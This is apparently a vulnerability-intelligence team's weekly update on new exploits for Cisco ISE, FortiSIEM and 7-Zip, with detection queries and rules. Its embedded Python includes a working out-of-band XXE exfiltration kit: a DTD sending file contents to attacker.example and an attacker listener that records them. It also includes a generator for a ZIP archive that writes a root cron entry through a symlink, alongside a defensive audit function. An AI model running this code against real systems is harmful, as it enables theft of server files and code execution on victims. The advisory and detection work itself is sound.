Happy Friday! The Initial Access Intelligence team's deliverables for the past week are as follows.
By customer request, this week the team added an exploit for CVE-2026-20029, an authenticated XXE vulnerability in Cisco Identity Services Engine (ISE); exploitation requires administrative privileges. There are currently no public PoCs for this vulnerability, and it is not known to be exploited in the wild. Our ASM queries find between 500 and 700 Cisco ISE systems exposed on the internet.
Notably, this exploit has a hard limitation that is fairly common amongst out-of-band (OOB) XXE vulnerabilities: the file named by the -path argument must be a single line. In an OOB XXE the file contents are expanded into the URL of a second request to the attacker's server, and a newline makes that URL invalid. If the file spans more than one line, the parser will still fetch the external DTD, which proves the XXE, but it will not make the second request, so no file contents are received. Single-line targets (hostnames, version strings, individual config values) are the practical choice. The exploit comes with PCAPs, ASM queries, and network rules.
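To make that limitation concrete, here is an added example in Python; it is not the team's exploit code. It builds the standard OOB XXE DTD, models which second request a parser would make for a given file's contents, and includes the listener side that serves the DTD and records the exfiltrated line. The listener address, the `.dtd` path, the target file and the parser model (one line, no quote that ends the SYSTEM literal, percent-encoded into the URL) are assumptions of this example, not facts about Cisco ISE.

```python
"""Out-of-band XXE: why a multi-line target file proves the bug but leaks nothing.
Added example, not the team's exploit. Listener, DTD path and target are placeholders."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, urlparse

LISTENER = "http://attacker.example:8000"   # hypothetical attacker-controlled host
TARGET = "/etc/hostname"                    # placeholder single-line file on the victim


def build_oob_dtd(target_path: str, listener: str = LISTENER) -> str:
    """Standard OOB DTD: %file reads the target, %eval declares %exfil with the
    contents spliced into its SYSTEM URL, and %exfil; makes the parser fetch it.
    A %file; reference inside an entity value is only legal in an external
    subset, which is why this lives on the attacker's server, not in the document."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{listener}/?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def build_document(dtd_url: str) -> str:
    """The XML the exploit submits; it only points at the remote DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "{dtd_url}"> %dtd; ]>\n'
        "<data/>\n"
    )


def simulate_parser(file_contents: bytes, listener: str = LISTENER) -> dict:
    """Model of the victim parser after it has fetched the DTD (an assumption that
    follows the behaviour described above, not a real parser). The DTD fetch always
    happens; the second request is only made when the expanded contents still form
    a valid URL: one line, with no quote that would end the SYSTEM literal early."""
    text = file_contents.decode("utf-8", errors="replace")
    lines = text.splitlines()
    result = {"dtd_requested": True, "exfil_url": None, "reason": None}
    if len(lines) > 1:
        result["reason"] = "newline inside the expanded URL: invalid URL, no second request"
    elif lines and "'" in lines[0]:
        result["reason"] = "single quote ends the SYSTEM literal early: malformed DTD"
    else:
        line = lines[0] if lines else ""
        # Real parsers differ in how they escape the spliced text; percent-encoding
        # here keeps the model consistent with what the listener below decodes.
        result["exfil_url"] = f"{listener}/?d={quote(line, safe='')}"
    return result


def single_line_candidates(files: dict) -> list:
    """Pre-flight check for the -path choice: keep only files this channel can carry."""
    return [path for path, contents in files.items() if simulate_parser(contents)["exfil_url"]]


class ExfilHandler(BaseHTTPRequestHandler):
    """Attacker listener: serves the DTD on any /*.dtd path and records the d=
    parameter of the second request. Run with HTTPServer(("0.0.0.0", 8000), ExfilHandler)."""
    received: list = []

    def do_GET(self):
        url = urlparse(self.path)
        if url.path.endswith(".dtd"):
            body = build_oob_dtd(TARGET).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # parse_qs already percent-decodes, so the raw line lands here as-is.
        self.received.append(parse_qs(url.query).get("d", [""])[0])
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    print(build_document(f"{LISTENER}/x.dtd"))
    # Constructed samples: a one-line hostname file and a two-line passwd fragment.
    for sample in (b"ise-node-1\n",
                   b"root:x:0:0:root:/root:/bin/bash\nbin:x:1:1::/bin:/usr/sbin/nologin\n"):
        print(simulate_parser(sample))
```

Running the script prints the submitted document and the two simulated outcomes: the hostname sample yields an exfil URL, the passwd fragment yields a DTD fetch with no second request. On an engagement, `single_line_candidates` is the check to run over the files you are considering for -path before spending requests on them.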
The team added an exploit for CVE-2025-64155, a vulnerability in Fortinet FortiSIEM's phMonitor service, which by default listens on port 7900 on all network interfaces. Our exploit leverages curl arguments to gain an arbitrary file write as the admin user, which in turn allowed us to achieve remote code execution as root. In our testing, the public exploit code required modification in order to run successfully. CVE-2025-64155 was added to VulnCheck KEV on January 15, 2026; it is not yet on CISA KEV. Our exploit comes with network rules and PCAPs.
The team developed a 7-zip file generator to exploit CVE-2025-11001, an arbitrary file write on extraction. The exploit relies on incorrect handling of hard links on Windows, and it requires that the user be running 7-zip as an administrator, which we believe reduces the vulnerability's real-world impact. The team delivered an exploit generator that achieves RCE on file extraction and a Sigma rule for detecting extraction of potentially malicious zip files.
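As an added illustration of the class of bug (link entries in an archive that redirect a later write outside the extraction directory), here is a Python example that is not the team's generator or its Sigma rule. It generalizes slightly: the 7-Zip hard-link case is not reproducible with the standard library, so the archive uses a symbolic-link entry, which ZIP stores as Unix mode bits in `external_attr`, followed by a payload written through the link. The `audit_zip` function is the pre-extraction check a defender can run on a suspicious archive; destination paths are assumed POSIX-style for simplicity.

```python
"""Archive link traversal: build a two-step ZIP (link, then write through it) and
audit it before extraction. Added example; not 7-Zip's code or the team's generator."""
import io
import posixpath
import stat
import zipfile

MODE_SHIFT = 16  # ZIP keeps Unix mode bits in the high 16 bits of external_attr


def build_zip(entries):
    """Build an archive in memory. entries: iterable of (name, data, is_symlink).
    For a symlink entry the member body is the link target, as Info-ZIP stores it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data, is_symlink in entries:
            zi = zipfile.ZipInfo(name)
            mode = (stat.S_IFLNK | 0o777) if is_symlink else (stat.S_IFREG | 0o644)
            zi.external_attr = mode << MODE_SHIFT
            zf.writestr(zi, data)
    return buf.getvalue()


def audit_zip(data, dest):
    """Pre-extraction audit. Returns (member, reason) pairs for entries that would
    land outside dest on an extractor that honours links. It only sees what the
    archive declares; running the extractor unprivileged is the real mitigation."""
    dest = posixpath.normpath(dest)
    findings = []
    links = set()  # names of link entries seen so far, in archive order
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            name = zi.filename
            parts = name.split("/")
            if name.startswith("/") or ".." in parts:
                findings.append((name, "path traversal in entry name"))
            mode = zi.external_attr >> MODE_SHIFT
            if stat.S_ISLNK(mode):
                target = zf.read(zi).decode("utf-8", "replace")
                resolved = posixpath.normpath(
                    posixpath.join(dest, posixpath.dirname(name), target))
                if resolved != dest and not resolved.startswith(dest + "/"):
                    findings.append((name, f"symlink escapes destination: {target}"))
                links.add(name)
                continue
            # A later regular entry whose path passes through an earlier link is the
            # two-step write: the link redirects it, the extractor writes the payload.
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append((name, f"writes through symlink {prefix}"))
                    break
    return findings


if __name__ == "__main__":
    # Constructed sample: a link to a privileged directory, then a file through it.
    malicious = build_zip([
        ("link", b"../../../etc/cron.d", True),
        ("link/backdoor", b"* * * * * root id\n", False),
    ])
    for member, reason in audit_zip(malicious, "/tmp/extract"):
        print(f"{member}: {reason}")
```

Python's own `zipfile.extractall` writes a symlink member as a regular file containing the target path, so it is not itself vulnerable to this archive; the audit is for archives destined for extractors that do create links. The page's point about administrative privileges applies here too: on Windows, creating links during extraction needs privileges an ordinary user does not have, which is why the exploit's impact is reduced.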
The team added ASM queries for CVE-2026-20045, a freshly disclosed zero-day code injection vulnerability in multiple Cisco communications products. Affected products include Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance. The team's queries look for potentially vulnerable Cisco Unified CM instances; Censys shows fewer than 10 of these online, while Shodan and FOFA find between 150 and 500.